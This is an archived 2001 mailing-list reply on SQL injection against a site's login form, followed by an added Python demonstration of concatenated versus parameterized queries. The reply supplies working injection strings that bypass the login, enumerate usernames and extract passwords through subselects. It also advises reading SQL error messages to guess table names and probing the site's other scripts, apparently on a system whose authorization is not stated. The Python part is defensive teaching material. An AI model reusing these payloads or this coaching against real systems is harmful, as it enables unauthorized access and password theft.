Re: SQL Code

From: Kevin Spett (kspettat_private)
Date: Fri Nov 30 2001 - 23:51:10 PST


> Username: ' OR ''='
> Password: <blank>
>
> Yields an 'account is locked out message' rather than a password failure
> message regardless of what is put in the password field.
>
> The site allows for users to register as 'guests' for the logon process,
> the username format follows:
>
> Username: blahat_private
> Password: somepassword

Using ' OR ''=' is matching the very first username in the table.  In order
to get the second, try using this:
' + (SELECT Username From Usertable WHERE Username NOT IN  ((SELECT TOP 1
Username FROM Usertable WHERE 1=1)) + '

Get by the password by using either:
*'
...or if that doesn't work for some reason...
' + (SELECT password FROM Usertable WHERE Username = /* Put either the
literal username (if you can find it) in quotes or the whole subselect that
you used for the username */) + '

In order to get the next user login, change the NOT IN Value to the literal
username (if you can find it) in quotes of the last username, or the whole
subselect you used for username last time.

These require that you know the name of the table that contains the
usernames and passwords, and the names of the username and password fields.
They're usually not hard to guess or figure out from chunks of the SQL query
returned in the error message by sending arguments such as ', a', 'a, ;, '
OR, etc.  (This is Access or SQL Server, right?)  Have you tried messing
with the guest registration script, or any of the others on the server for
that matter?


> Invalid advise flags
I think that's a VBScript error, not a database server error.

Good luck.

Kevin Spett
Resident SQL Injection Specialist (I used to be a Resident SQL Injection
Ninja, but one of the suits made me change it.  You like that now, Wade?)
SPI Dynamics, Inc.
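
Added example, not part of the original post: a login lookup built by string concatenation next to the parameterized form, showing why the ' OR ''=' username lands on the first row of the table (hence the lockout message whatever the password) and how binding the input prevents it. Assumptions: SQLite stands in for Access/SQL Server, the Locked column and the lookup-by-username flow are guesses at how the site works, and the rows are constructed sample data.

```python
import sqlite3

COLS = "Username, Password, Locked"

def make_db():
    # Constructed sample data. Table and column names follow the post;
    # the Locked column is an assumption. Plaintext passwords mirror the
    # schema the post implies; a real application stores password hashes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Usertable (Username TEXT, Password TEXT, Locked INTEGER)")
    db.executemany("INSERT INTO Usertable VALUES (?, ?, ?)", [
        ("admin@example.test", "s3cret", 1),   # first row, locked out
        ("guest@example.test", "guestpw", 0),
    ])
    return db

def _decide(row, password):
    # Lockout is checked before the password, which is why the password
    # field makes no difference once a locked row has been selected.
    if row is None:
        return "unknown user"
    if row[2]:
        return "account locked"
    return "login ok" if row[1] == password else "bad password"

def login_concat(db, username, password):
    # Vulnerable form: the input becomes part of the SQL text, so a quote
    # in it ends the string literal and the rest is parsed as SQL.
    sql = "SELECT " + COLS + " FROM Usertable WHERE Username = '" + username + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # Return a generic message; echoing the driver error hands the
        # client fragments of the query.
        return "database error"
    return _decide(row, password)

def login_param(db, username, password):
    # Hardened form: the input is bound as a value and is never parsed as SQL.
    sql = "SELECT " + COLS + " FROM Usertable WHERE Username = ?"
    return _decide(db.execute(sql, (username,)).fetchone(), password)

if __name__ == "__main__":
    db = make_db()
    for name in ("' OR ''='", "'", "guest@example.test"):
        print(repr(name), "| concat:", login_concat(db, name, "guestpw"),
              "| param:", login_param(db, name, "guestpw"))
```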